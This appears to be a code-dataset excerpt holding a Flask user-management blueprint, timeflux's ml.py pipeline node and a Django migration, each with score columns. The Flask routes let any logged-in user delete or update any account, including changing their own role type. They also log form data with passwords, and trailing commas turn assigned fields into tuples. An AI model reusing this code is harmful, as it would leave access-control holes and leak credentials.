@login_required
def user_delete(id):
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return { id: "Successfully deleted" }
@user_routes.route('/<int:id>', methods=["POST"])
@login_required
def user_update(id):
user = User.query.options(joinedload("type")).get(id)
form = UpdateUserForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
print("_______ FORM DATA",form.data)
user.username=form.data['username'],
user.email=form.data['email'],
user.hashed_password=generate_password_hash(form.password.data),
user.first_name=form.data['first_name'],
user.last_name=form.data['last_name'],
user.type_id=form.data['type_id'],
user.updated_at=datetime.now()
db.session.commit()
return user.to_dict_full()
return {'errors': validation_errors_to_error_messages(form.errors)}
@user_routes.route("/<int:id>/clients")
@login_required
def admin_fetch_clients(id):
authenticated = authenticate()
clientUsers = db.session.query(User).filter_by(type_id=2).all()
if authenticated["type_id"] != 1:
return jsonify({
"errors": [
"Unauthorized"
]
})
return jsonify([user.to_dict_full() for user in clientUsers])
| from datetime import datetime
from werkzeug.security import generate_password_hash
from flask import Blueprint, jsonify, request
from sqlalchemy.orm import joinedload
from flask_login import login_required
from app.models import db, User, Type
from app.forms import UpdateUserForm
from .auth_routes import authenticate, validation_errors_to_error_messages
user_routes = Blueprint('users', __name__)
@user_routes.route("/types")
def types():
types = db.session.query(Type).all()
return jsonify([type.name_to_id() for type in types])
@user_routes.route('/')
@login_required
def users():
users = db.session.query(User).all()
return jsonify([user.to_dict_full() for user in users])
@user_routes.route('/<int:id>')
@login_required
def user(id):
user = User.query.get(id)
return user.to_dict()
@user_routes.route('/<int:id>', methods=["DELETE"])
@login_required
def user_delete(id):
user = User.query.get(id)
db.session.delete(user)
db.session.commit()
return { id: "Successfully deleted" }
@user_routes.route('/<int:id>', methods=["POST"])
@login_required
def user_update(id):
user = User.query.options(joinedload("type")).get(id)
form = UpdateUserForm()
form['csrf_token'].data = request.cookies['csrf_token']
if form.validate_on_submit():
print("_______ FORM DATA",form.data)
user.username=form.data['username'],
user.email=form.data['email'],
user.hashed_password=generate_password_hash(form.password.data),
user.first_name=form.data['first_name'],
user.last_name=form.data['last_name'],
user.type_id=form.data['type_id'],
user.updated_at=datetime.now()
db.session.commit()
return user.to_dict_full()
return {'errors': validation_errors_to_error_messages(form.errors)}
@user_routes.route("/<int:id>/clients")
@login_required
def admin_fetch_clients(id):
authenticated = authenticate()
clientUsers = db.session.query(User).filter_by(type_id=2).all()
if authenticated["type_id"] != 1:
return jsonify({
"errors": [
"Unauthorized"
]
})
return jsonify([user.to_dict_full() for user in clientUsers])
| none | 1 | 2.421405 | 2 |
|
timeflux/nodes/ml.py | OpenMindInnovation/timeflux | 0 | 10309 | """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
class Pipeline(Node):
"""Fit, transform and predict.
Training on continuous data is always unsupervised.
Training on epoched data can either be supervised or unsupervised.
If fit is `False`, input events are ignored, and initital training is not performed.
Automatically set to False if mode is either 'fit_predict' or fit_transform'.
Automatically set to True if mode is either 'predict', 'predict_proba' or 'predict_log_proba'.
Attributes:
i (Port): Continuous data input, expects DataFrame.
i_* (Port): Epoched data input, expects DataFrame.
i_training (Port): Continuous training data input, expects DataFrame.
i_training_* (Port): Epoched training data input, expects DataFrame.
i_events (Port): Event input, expects DataFrame.
o (Port): Continuous data output, provides DataFrame.
o_* (Port): Epoched data output, provides DataFrame.
o_events (Port): Event output, provides DataFrame.
Args:
steps (dict): Pipeline steps and settings
fit (bool):
mode ('predict'|'predict_proba'|'predict_log_proba'|'transform'|'fit_predict'|'fit_transform'):
meta_label (str|tuple|None):
event_start_accumulation (str):
event_stop_accumulation (str):
event_start_training (str):
event_reset (str):
buffer_size (str):
passthrough (bool):
resample (bool):
resample_direction ('right'|'left'|'both'):
resample_rate (None|float):
model: Load a pickle model - NOT IMPLEMENTED
cv: Cross-validation - NOT IMPLEMENTED
"""
def __init__(
self,
steps,
fit=True,
mode="predict",
meta_label=("epoch", "context", "target"),
event_start_accumulation="accumulation_starts",
event_stop_accumulation="accumulation_stops",
event_start_training="training_starts",
event_reset=None,
buffer_size="5s",
passthrough=False,
resample=False,
resample_direction="right",
resample_rate=None,
model=None,
cv=None,
use_task = True,
):
# TODO: validation
# TODO: model loading from file
# TODO: cross-validation
# TODO: provide more context for errors
self.fit = fit
self.mode = mode
self.meta_label = meta_label
self.event_start_accumulation = event_start_accumulation
self.event_stop_accumulation = event_stop_accumulation
self.event_start_training = event_start_training
self.event_reset = event_reset
self.passthrough = passthrough
self.resample = resample
self.resample_direction = resample_direction
self.resample_rate = resample_rate
self.use_task = use_task
self._buffer_size = pd.Timedelta(buffer_size)
self._make_pipeline(steps)
self._reset()
def update(self):
# Let's get ready
self._clear()
# Reset
if self.event_reset:
matches = match_events(self.i_events, self.event_reset)
if matches is not None:
self.logger.debug("Reset")
if self._task is not None:
if self._status == FITTING:
self._task.stop()
self._reset()
# Are we dealing with continuous data or epochs?
if self._dimensions is None:
port_name = "i_training" if self.fit else "i"
if getattr(self, port_name).ready():
self._dimensions = 2
elif len(list(self.iterate(port_name + "_*"))) > 0:
self._dimensions = 3
# Set the accumulation boundaries
if self._accumulation_start is None:
matches = match_events(self.i_events, self.event_start_accumulation)
if matches is not None:
self._accumulation_start = matches.index.values[0]
self._status = ACCUMULATING
self.logger.debug("Start accumulation")
if self._accumulation_stop is None:
matches = match_events(self.i_events, self.event_stop_accumulation)
if matches is not None:
self._accumulation_stop = matches.index.values[0]
self.logger.debug("Stop accumulation")
# Always buffer a few seconds, in case the start event is coming late
if self._status == IDLE:
start = (now() - self._buffer_size).to_datetime64()
stop = max_time()
self._accumulate(start, stop)
# Accumulate between boundaries
if self._status == ACCUMULATING:
start = self._accumulation_start
stop = self._accumulation_stop if self._accumulation_stop else max_time()
self._accumulate(start, stop)
# Should we start fitting the model?
if self._status < FITTING:
if match_events(self.i_events, self.event_start_training) is not None:
self._status = FITTING
self.logger.debug("Start training")
if self.use_task:
self._task = Task(
self._pipeline, "fit", self._X_train, self._y_train
).start()
else:
try:
self._pipeline = self._pipeline.fit(self._X_train, self._y_train)
self._fitted_success = True
except Exception as error:
self._fitted_success = False
# Is the model ready?
if self._status == FITTING:
ready_to_proceed = False
if self.use_task:
status = self._task.status()
if status:
ready_to_proceed = True
else:
ready_to_proceed = True
if ready_to_proceed:
if self.use_task:
success = status["success"]
else:
success = self._fitted_success
if success:
if self.use_task:
self._pipeline = status["instance"]
self.logger.debug(f"Model fitted in {status['time']} seconds")
else:
self.logger.debug(f"Model fitted")
self._status = READY
# TODO: this can potentially be overwritten in _send()
self.o_events.data = make_event("ready")
else:
if self.use_task:
self.logger.error(
f"An error occured while fitting: {status['exception'].args[0]}"
)
self.logger.debug(
"\nTraceback (most recent call last):\n"
+ "".join(status["traceback"])
)
else:
self.logger.error(
f"An error occured while fitting"
)
raise WorkerInterrupt()
# Run the pipeline
if self._status == READY:
self._receive()
if self._X is not None:
args = [self._X]
if self.mode.startswith("fit"):
args.append(self._y)
# TODO: optionally loop through epochs instead of sending them all at once
self._out = getattr(self._pipeline, self.mode)(*args)
# Set output streams
self._send()
def terminate(self):
# Kill the fit subprocess
if self._task is not None:
self._task.stop()
def _reset(self):
self._X_train = None
self._y_train = None
self._X_train_indices = np.array([], dtype=np.datetime64)
self._accumulation_start = None
self._accumulation_stop = None
self._dimensions = None
self._shape = ()
self._task = None
if self.mode.startswith("fit"):
self.fit = False
elif self.mode.startswith("predict"):
self.fit = True
if self.fit:
self._status = IDLE
else:
self._status = READY
def _clear(self):
self._X = None
self._y = None
self._X_indices = []
self._X_columns = []
self._X_meta = None
self._out = None
def _make_pipeline(self, steps):
schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"module": {"type": "string"},
"class": {"type": "string"},
"args": {"type": "object"},
},
"required": ["module", "class"],
},
}
try:
validate(instance=steps, schema=schema)
except Exception as error:
raise ValidationError("steps", error.message)
pipeline = []
for step in steps:
try:
args = step["args"] if "args" in step else {}
m = importlib.import_module(step["module"])
c = getattr(m, step["class"])
i = c(**args)
pipeline.append(i)
except ImportError as error:
raise ValidationError("steps", f"could not import '{step['module']}'")
except AttributeError as error:
raise ValidationError(
"steps", f"could not find class '{step['class']}'"
)
except TypeError as error:
raise ValidationError(
"steps",
f"could not instantiate class '{step['class']}' with the given params",
)
# TODO: memory and verbose args
self._pipeline = make_pipeline(*pipeline, memory=None, verbose=False)
def _accumulate(self, start, stop):
# Do nothing if no fitting required
if not self.fit:
return
# Set defaults
indices = np.array([], dtype=np.datetime64)
# Accumulate continuous data
if self._dimensions == 2:
if self.i_training.ready():
data = self.i_training.data
mask = (data.index >= start) & (data.index < stop)
data = data[mask]
if not data.empty:
if self._X_train is None:
self._X_train = data.values
self._shape = self._X_train.shape[1]
indices = data.index.values
else:
if data.shape[1] == self._shape:
self._X_train = np.vstack((self._X_train, data.values))
indices = data.index.values
else:
self.logger.warning("Invalid shape")
# Accumulate epoched data
if self._dimensions == 3:
for _, _, port in self.iterate("i_training_*"):
if port.ready():
index = port.data.index.values[0]
if index >= start and index < stop:
data = port.data.values
label = get_meta(port, self.meta_label)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X_train is None:
self._X_train = np.array([data])
self._shape = self._X_train.shape[1:]
else:
self._X_train = np.vstack((self._X_train, [data]))
indices = np.append(indices, index)
if label is not None:
if self._y_train is None:
self._y_train = np.array([label])
else:
self._y_train = np.append(self._y_train, [label])
# Store indices
if indices.size != 0:
self._X_train_indices = np.append(self._X_train_indices, indices)
# Trim
if self._X_train is not None:
mask = (self._X_train_indices >= start) & (self._X_train_indices < stop)
self._X_train = self._X_train[mask]
self._X_train_indices = self._X_train_indices[mask]
if self._y_train is not None:
self._y_train = self._y_train[mask]
def _receive(self):
# Continuous data
if self._dimensions == 2:
if self.i.ready():
if not self._X_columns:
self._X_columns = list(self.i.data.columns)
if self._shape and (self.i.data.shape[1] != self._shape):
self.logger.warning("Invalid shape")
else:
self._X = self.i.data.values
self._X_indices = self.i.data.index.values
self._X_meta = self.i.meta
# Epochs
if self._dimensions == 3:
for name, _, port in self.iterate("i_*"):
if port.ready() and "training" not in name and "events" not in name:
data = port.data.values
meta = port.meta
indices = port.data.index.values
label = get_meta(port, self.meta_label)
if not self._X_columns:
self._X_columns = list(port.data.columns)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if not self.fit and self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X is None:
self._X = []
if self._y is None and label is not None:
self._y = []
if self._X_meta is None:
self._X_meta = []
self._X.append(data)
self._X_indices.append(indices)
self._X_meta.append(meta)
if label is not None:
self._y.append(label)
def _send(self):
# Passthrough
if self._status < READY and self.passthrough:
inputs = []
for _, suffix, port in self.iterate("i*"):
if not suffix.startswith("_training") and not suffix.startswith(
"_events"
):
inputs.append((suffix, port))
for suffix, src_port in inputs:
dst_port = getattr(self, "o" + suffix)
dst_port.data = src_port.data
dst_port.meta = src_port.meta
# Model
if self._out is not None:
if "predict" in self.mode:
# Send events
if len(self._X_indices) == len(self._out):
# TODO: skip JSON serialization?
data = [
[self.mode, json.dumps({"result": self._np_to_native(result)})]
for result in self._out
]
times = (
self._X_indices
if self._dimensions == 2
else np.asarray(self._X_indices)[:, 0]
) # Keep the first timestamp of each epoch
names = ["label", "data"]
meta = (
self._X_meta
if self._dimensions == 2
else {"epochs": self._X_meta}
) # port.meta should always be an object
self.o_events.set(data, times, names, meta)
else:
self.logger.warning(
"Number of predictions inconsistent with input length"
)
else:
# Send data
if self._dimensions == 2:
try:
self.o.data = self._reindex(
self._out, self._X_indices, self._X_columns
)
self.o.meta = self._X_meta
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
if self._dimensions == 3:
if len(self._X_indices) == len(self._out):
for i, (data, times) in enumerate(
zip(self._out, self._X_indices)
):
try:
getattr(self, "o_" + str(i)).data = self._reindex(
data, times, self._X_columns
)
getattr(self, "o_" + str(i)).meta = self._X_meta[i]
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
else:
self.logger.warning(
"Number of transforms inconsistent with number of epochs"
)
def _np_to_native(self, data):
"""Convert numpy scalars and objects to native types."""
return getattr(data, "tolist", lambda: data)()
def _reindex(self, data, times, columns):
if len(data) != len(times):
if self.resample:
# Resample at a specific frequency
kwargs = {"periods": len(data)}
if self.resample_rate is None:
kwargs["freq"] = pd.infer_freq(times)
kwargs["freq"] = pd.tseries.frequencies.to_offset(kwargs["freq"])
else:
kwargs["freq"] = pd.DateOffset(seconds=1 / self.resample_rate)
if self.resample_direction == "right":
kwargs["start"] = times[0]
elif self.resample_direction == "left":
kwargs["end"] = times[-1]
else:
def middle(a):
return int(np.ceil(len(a) / 2)) - 1
kwargs["start"] = times[middle(times)] - (
middle(data) * kwargs["freq"]
)
times = pd.date_range(**kwargs)
else:
# Linearly arange between first and last
times = pd.date_range(start=times[0], end=times[-1], periods=len(data))
return pd.DataFrame(data, times, columns)
| """Machine Learning"""
import importlib
import numpy as np
import pandas as pd
import json
from jsonschema import validate
from sklearn.pipeline import make_pipeline
from timeflux.core.node import Node
from timeflux.core.exceptions import ValidationError, WorkerInterrupt
from timeflux.helpers.background import Task
from timeflux.helpers.port import make_event, match_events, get_meta
from timeflux.helpers.clock import now, min_time, max_time
# Statuses
IDLE = 0
ACCUMULATING = 1
FITTING = 2
READY = 3
class Pipeline(Node):
"""Fit, transform and predict.
Training on continuous data is always unsupervised.
Training on epoched data can either be supervised or unsupervised.
If fit is `False`, input events are ignored, and initital training is not performed.
Automatically set to False if mode is either 'fit_predict' or fit_transform'.
Automatically set to True if mode is either 'predict', 'predict_proba' or 'predict_log_proba'.
Attributes:
i (Port): Continuous data input, expects DataFrame.
i_* (Port): Epoched data input, expects DataFrame.
i_training (Port): Continuous training data input, expects DataFrame.
i_training_* (Port): Epoched training data input, expects DataFrame.
i_events (Port): Event input, expects DataFrame.
o (Port): Continuous data output, provides DataFrame.
o_* (Port): Epoched data output, provides DataFrame.
o_events (Port): Event output, provides DataFrame.
Args:
steps (dict): Pipeline steps and settings
fit (bool):
mode ('predict'|'predict_proba'|'predict_log_proba'|'transform'|'fit_predict'|'fit_transform'):
meta_label (str|tuple|None):
event_start_accumulation (str):
event_stop_accumulation (str):
event_start_training (str):
event_reset (str):
buffer_size (str):
passthrough (bool):
resample (bool):
resample_direction ('right'|'left'|'both'):
resample_rate (None|float):
model: Load a pickle model - NOT IMPLEMENTED
cv: Cross-validation - NOT IMPLEMENTED
"""
def __init__(
self,
steps,
fit=True,
mode="predict",
meta_label=("epoch", "context", "target"),
event_start_accumulation="accumulation_starts",
event_stop_accumulation="accumulation_stops",
event_start_training="training_starts",
event_reset=None,
buffer_size="5s",
passthrough=False,
resample=False,
resample_direction="right",
resample_rate=None,
model=None,
cv=None,
use_task = True,
):
# TODO: validation
# TODO: model loading from file
# TODO: cross-validation
# TODO: provide more context for errors
self.fit = fit
self.mode = mode
self.meta_label = meta_label
self.event_start_accumulation = event_start_accumulation
self.event_stop_accumulation = event_stop_accumulation
self.event_start_training = event_start_training
self.event_reset = event_reset
self.passthrough = passthrough
self.resample = resample
self.resample_direction = resample_direction
self.resample_rate = resample_rate
self.use_task = use_task
self._buffer_size = pd.Timedelta(buffer_size)
self._make_pipeline(steps)
self._reset()
def update(self):
# Let's get ready
self._clear()
# Reset
if self.event_reset:
matches = match_events(self.i_events, self.event_reset)
if matches is not None:
self.logger.debug("Reset")
if self._task is not None:
if self._status == FITTING:
self._task.stop()
self._reset()
# Are we dealing with continuous data or epochs?
if self._dimensions is None:
port_name = "i_training" if self.fit else "i"
if getattr(self, port_name).ready():
self._dimensions = 2
elif len(list(self.iterate(port_name + "_*"))) > 0:
self._dimensions = 3
# Set the accumulation boundaries
if self._accumulation_start is None:
matches = match_events(self.i_events, self.event_start_accumulation)
if matches is not None:
self._accumulation_start = matches.index.values[0]
self._status = ACCUMULATING
self.logger.debug("Start accumulation")
if self._accumulation_stop is None:
matches = match_events(self.i_events, self.event_stop_accumulation)
if matches is not None:
self._accumulation_stop = matches.index.values[0]
self.logger.debug("Stop accumulation")
# Always buffer a few seconds, in case the start event is coming late
if self._status == IDLE:
start = (now() - self._buffer_size).to_datetime64()
stop = max_time()
self._accumulate(start, stop)
# Accumulate between boundaries
if self._status == ACCUMULATING:
start = self._accumulation_start
stop = self._accumulation_stop if self._accumulation_stop else max_time()
self._accumulate(start, stop)
# Should we start fitting the model?
if self._status < FITTING:
if match_events(self.i_events, self.event_start_training) is not None:
self._status = FITTING
self.logger.debug("Start training")
if self.use_task:
self._task = Task(
self._pipeline, "fit", self._X_train, self._y_train
).start()
else:
try:
self._pipeline = self._pipeline.fit(self._X_train, self._y_train)
self._fitted_success = True
except Exception as error:
self._fitted_success = False
# Is the model ready?
if self._status == FITTING:
ready_to_proceed = False
if self.use_task:
status = self._task.status()
if status:
ready_to_proceed = True
else:
ready_to_proceed = True
if ready_to_proceed:
if self.use_task:
success = status["success"]
else:
success = self._fitted_success
if success:
if self.use_task:
self._pipeline = status["instance"]
self.logger.debug(f"Model fitted in {status['time']} seconds")
else:
self.logger.debug(f"Model fitted")
self._status = READY
# TODO: this can potentially be overwritten in _send()
self.o_events.data = make_event("ready")
else:
if self.use_task:
self.logger.error(
f"An error occured while fitting: {status['exception'].args[0]}"
)
self.logger.debug(
"\nTraceback (most recent call last):\n"
+ "".join(status["traceback"])
)
else:
self.logger.error(
f"An error occured while fitting"
)
raise WorkerInterrupt()
# Run the pipeline
if self._status == READY:
self._receive()
if self._X is not None:
args = [self._X]
if self.mode.startswith("fit"):
args.append(self._y)
# TODO: optionally loop through epochs instead of sending them all at once
self._out = getattr(self._pipeline, self.mode)(*args)
# Set output streams
self._send()
def terminate(self):
# Kill the fit subprocess
if self._task is not None:
self._task.stop()
def _reset(self):
self._X_train = None
self._y_train = None
self._X_train_indices = np.array([], dtype=np.datetime64)
self._accumulation_start = None
self._accumulation_stop = None
self._dimensions = None
self._shape = ()
self._task = None
if self.mode.startswith("fit"):
self.fit = False
elif self.mode.startswith("predict"):
self.fit = True
if self.fit:
self._status = IDLE
else:
self._status = READY
def _clear(self):
self._X = None
self._y = None
self._X_indices = []
self._X_columns = []
self._X_meta = None
self._out = None
def _make_pipeline(self, steps):
schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"module": {"type": "string"},
"class": {"type": "string"},
"args": {"type": "object"},
},
"required": ["module", "class"],
},
}
try:
validate(instance=steps, schema=schema)
except Exception as error:
raise ValidationError("steps", error.message)
pipeline = []
for step in steps:
try:
args = step["args"] if "args" in step else {}
m = importlib.import_module(step["module"])
c = getattr(m, step["class"])
i = c(**args)
pipeline.append(i)
except ImportError as error:
raise ValidationError("steps", f"could not import '{step['module']}'")
except AttributeError as error:
raise ValidationError(
"steps", f"could not find class '{step['class']}'"
)
except TypeError as error:
raise ValidationError(
"steps",
f"could not instantiate class '{step['class']}' with the given params",
)
# TODO: memory and verbose args
self._pipeline = make_pipeline(*pipeline, memory=None, verbose=False)
def _accumulate(self, start, stop):
# Do nothing if no fitting required
if not self.fit:
return
# Set defaults
indices = np.array([], dtype=np.datetime64)
# Accumulate continuous data
if self._dimensions == 2:
if self.i_training.ready():
data = self.i_training.data
mask = (data.index >= start) & (data.index < stop)
data = data[mask]
if not data.empty:
if self._X_train is None:
self._X_train = data.values
self._shape = self._X_train.shape[1]
indices = data.index.values
else:
if data.shape[1] == self._shape:
self._X_train = np.vstack((self._X_train, data.values))
indices = data.index.values
else:
self.logger.warning("Invalid shape")
# Accumulate epoched data
if self._dimensions == 3:
for _, _, port in self.iterate("i_training_*"):
if port.ready():
index = port.data.index.values[0]
if index >= start and index < stop:
data = port.data.values
label = get_meta(port, self.meta_label)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X_train is None:
self._X_train = np.array([data])
self._shape = self._X_train.shape[1:]
else:
self._X_train = np.vstack((self._X_train, [data]))
indices = np.append(indices, index)
if label is not None:
if self._y_train is None:
self._y_train = np.array([label])
else:
self._y_train = np.append(self._y_train, [label])
# Store indices
if indices.size != 0:
self._X_train_indices = np.append(self._X_train_indices, indices)
# Trim
if self._X_train is not None:
mask = (self._X_train_indices >= start) & (self._X_train_indices < stop)
self._X_train = self._X_train[mask]
self._X_train_indices = self._X_train_indices[mask]
if self._y_train is not None:
self._y_train = self._y_train[mask]
def _receive(self):
# Continuous data
if self._dimensions == 2:
if self.i.ready():
if not self._X_columns:
self._X_columns = list(self.i.data.columns)
if self._shape and (self.i.data.shape[1] != self._shape):
self.logger.warning("Invalid shape")
else:
self._X = self.i.data.values
self._X_indices = self.i.data.index.values
self._X_meta = self.i.meta
# Epochs
if self._dimensions == 3:
for name, _, port in self.iterate("i_*"):
if port.ready() and "training" not in name and "events" not in name:
data = port.data.values
meta = port.meta
indices = port.data.index.values
label = get_meta(port, self.meta_label)
if not self._X_columns:
self._X_columns = list(port.data.columns)
if self._shape and (data.shape != self._shape):
self.logger.warning("Invalid shape")
continue
if not self.fit and self.meta_label is not None and label is None:
self.logger.warning("Invalid label")
continue
if self._X is None:
self._X = []
if self._y is None and label is not None:
self._y = []
if self._X_meta is None:
self._X_meta = []
self._X.append(data)
self._X_indices.append(indices)
self._X_meta.append(meta)
if label is not None:
self._y.append(label)
def _send(self):
# Passthrough
if self._status < READY and self.passthrough:
inputs = []
for _, suffix, port in self.iterate("i*"):
if not suffix.startswith("_training") and not suffix.startswith(
"_events"
):
inputs.append((suffix, port))
for suffix, src_port in inputs:
dst_port = getattr(self, "o" + suffix)
dst_port.data = src_port.data
dst_port.meta = src_port.meta
# Model
if self._out is not None:
if "predict" in self.mode:
# Send events
if len(self._X_indices) == len(self._out):
# TODO: skip JSON serialization?
data = [
[self.mode, json.dumps({"result": self._np_to_native(result)})]
for result in self._out
]
times = (
self._X_indices
if self._dimensions == 2
else np.asarray(self._X_indices)[:, 0]
) # Keep the first timestamp of each epoch
names = ["label", "data"]
meta = (
self._X_meta
if self._dimensions == 2
else {"epochs": self._X_meta}
) # port.meta should always be an object
self.o_events.set(data, times, names, meta)
else:
self.logger.warning(
"Number of predictions inconsistent with input length"
)
else:
# Send data
if self._dimensions == 2:
try:
self.o.data = self._reindex(
self._out, self._X_indices, self._X_columns
)
self.o.meta = self._X_meta
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
if self._dimensions == 3:
if len(self._X_indices) == len(self._out):
for i, (data, times) in enumerate(
zip(self._out, self._X_indices)
):
try:
getattr(self, "o_" + str(i)).data = self._reindex(
data, times, self._X_columns
)
getattr(self, "o_" + str(i)).meta = self._X_meta[i]
except Exception as e:
self.logger.warning(getattr(e, "message", repr(e)))
else:
self.logger.warning(
"Number of transforms inconsistent with number of epochs"
)
def _np_to_native(self, data):
"""Convert numpy scalars and objects to native types."""
return getattr(data, "tolist", lambda: data)()
def _reindex(self, data, times, columns):
if len(data) != len(times):
if self.resample:
# Resample at a specific frequency
kwargs = {"periods": len(data)}
if self.resample_rate is None:
kwargs["freq"] = pd.infer_freq(times)
kwargs["freq"] = pd.tseries.frequencies.to_offset(kwargs["freq"])
else:
kwargs["freq"] = pd.DateOffset(seconds=1 / self.resample_rate)
if self.resample_direction == "right":
kwargs["start"] = times[0]
elif self.resample_direction == "left":
kwargs["end"] = times[-1]
else:
def middle(a):
return int(np.ceil(len(a) / 2)) - 1
kwargs["start"] = times[middle(times)] - (
middle(data) * kwargs["freq"]
)
times = pd.date_range(**kwargs)
else:
# Linearly arange between first and last
times = pd.date_range(start=times[0], end=times[-1], periods=len(data))
return pd.DataFrame(data, times, columns)
| en | 0.707414 | Machine Learning # Statuses Fit, transform and predict. Training on continuous data is always unsupervised. Training on epoched data can either be supervised or unsupervised. If fit is `False`, input events are ignored, and initital training is not performed. Automatically set to False if mode is either 'fit_predict' or fit_transform'. Automatically set to True if mode is either 'predict', 'predict_proba' or 'predict_log_proba'. Attributes: i (Port): Continuous data input, expects DataFrame. i_* (Port): Epoched data input, expects DataFrame. i_training (Port): Continuous training data input, expects DataFrame. i_training_* (Port): Epoched training data input, expects DataFrame. i_events (Port): Event input, expects DataFrame. o (Port): Continuous data output, provides DataFrame. o_* (Port): Epoched data output, provides DataFrame. o_events (Port): Event output, provides DataFrame. Args: steps (dict): Pipeline steps and settings fit (bool): mode ('predict'|'predict_proba'|'predict_log_proba'|'transform'|'fit_predict'|'fit_transform'): meta_label (str|tuple|None): event_start_accumulation (str): event_stop_accumulation (str): event_start_training (str): event_reset (str): buffer_size (str): passthrough (bool): resample (bool): resample_direction ('right'|'left'|'both'): resample_rate (None|float): model: Load a pickle model - NOT IMPLEMENTED cv: Cross-validation - NOT IMPLEMENTED # TODO: validation # TODO: model loading from file # TODO: cross-validation # TODO: provide more context for errors # Let's get ready # Reset # Are we dealing with continuous data or epochs? # Set the accumulation boundaries # Always buffer a few seconds, in case the start event is coming late # Accumulate between boundaries # Should we start fitting the model? # Is the model ready? # TODO: this can potentially be overwritten in _send() # Run the pipeline # TODO: optionally loop through epochs instead of sending them all at once # Set output streams # Kill the fit subprocess # TODO: memory and verbose args # Do nothing if no fitting required # Set defaults # Accumulate continuous data # Accumulate epoched data # Store indices # Trim # Continuous data # Epochs # Passthrough # Model # Send events # TODO: skip JSON serialization? # Keep the first timestamp of each epoch # port.meta should always be an object # Send data Convert numpy scalars and objects to native types. # Resample at a specific frequency # Linearly arange between first and last | 2.137059 | 2 |
cms/migrations/0006_auto_20170122_1545.py | josemlp91/django-landingcms | 0 | 10310 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 15:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('content', '0002_auto_20170122_1509'),
('cms', '0005_auto_20170122_1534'),
]
operations = [
migrations.AddField(
model_name='paginahome',
name='posts1_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts3_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts3_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts4_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts4_titulo', to='content.TitleContent'),
),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 15:45
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('content', '0002_auto_20170122_1509'),
('cms', '0005_auto_20170122_1534'),
]
operations = [
migrations.AddField(
model_name='paginahome',
name='posts1_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_texto',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_texto', to='content.TextContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts1_titulo',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts1_titulo', to='content.TitleContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_imagen',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts2_imagen', to='content.ImageContent'),
),
migrations.AddField(
model_name='paginahome',
name='posts2_texto',
